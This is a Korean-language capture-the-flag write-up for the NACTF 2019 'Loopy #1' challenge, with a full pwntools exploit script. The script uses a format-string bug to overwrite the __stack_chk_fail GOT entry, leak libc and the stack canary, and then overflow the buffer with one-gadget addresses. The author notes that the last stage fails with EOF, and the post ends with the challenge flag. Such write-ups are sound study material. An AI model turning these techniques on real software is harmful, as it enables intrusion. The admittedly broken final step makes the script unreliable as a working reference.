NACTF 2019 - Loopy #1

32 bit에 Partial RELRO, Canary, NX가 활성화되어있다.

 

IDA로 분석해보면

LOOPY #0와 다르게 Canary가 생겨서 ROP를 할 수 없게 됐다.

 

BOF 한 번과 FSB 한 번으로 익스를 어떻게 해야 하나 생각을 하다가 다음과 같이 생각했다.

FSB로 ___stack_chk_fail의 주소를 바꾼다면 canary가 바뀌어도 바뀐 ___stack_chk_fail함수가 실행될 것이다.

 

따라서 gets를 통해 ___stack_chk_fail의 got를 적고 포맷 스트링으로 그 주소를 vuln() 함수로 바꾼다면 무한 루프를 돌게 될 것이다.

 

마지막엔 원가젯을 마구 줘서 실행되게 했다.

 

exploit code

 

from pwn import *
 
p = remote("shell.2019.nactf.com", 31732)
 
one_offset = [0x3eae6, 0x3eae8, 0x3eaec, 0x3eaf3, 0x691eb, 0x691ec]
 
__stack_chk_got = 0x0804C014
libc_start_main = 0x804c01c
vuln = 0x080491A2
 
pay = p32(__stack_chk_got) + p32(libc_start_main)    # 7, 8
pay += '%' + str(0x91A2 - len(pay))+'d'
pay += '%7$hn'
pay += '--%8$s--'
pay += 'a'*(0x4C-len(pay))
p.sendlineafter("something>", pay)
 
p.recvuntil('--')
libc_start = u32(p.recv(4))
libc_base = libc_start - 109136
print "libc_start : " + hex(libc_start)
print "libc_base : " + hex(libc_base)
 
one = libc_base + one_offset[2]
 
pay = ''
pay += 'canary : %' + str(23)+'$x '
p.sendlineafter("something>", pay)
 
p.recvuntil("canary : ")
canary = int('0x'+p.recvuntil(' '),16)
print "canary : " + hex(canary)
 
pay = ''
pay += 'a'*(0x4c-0xc)
pay += p32(canary)
pay += p32(one)*20 # ..?? 
p.sendlineafter("something>", pay)
 
p.interactive()

 

마지막이 이상하게 원가젯을 적게 줘도, 많이 줘도 EOF가 뜨면서 안된다..

다른 익스 방법이 있는지 찾아봐야겠다.

 

 

 

flag : nactf{lo0p_4r0und_th3_G0T_VASfJ4VJ}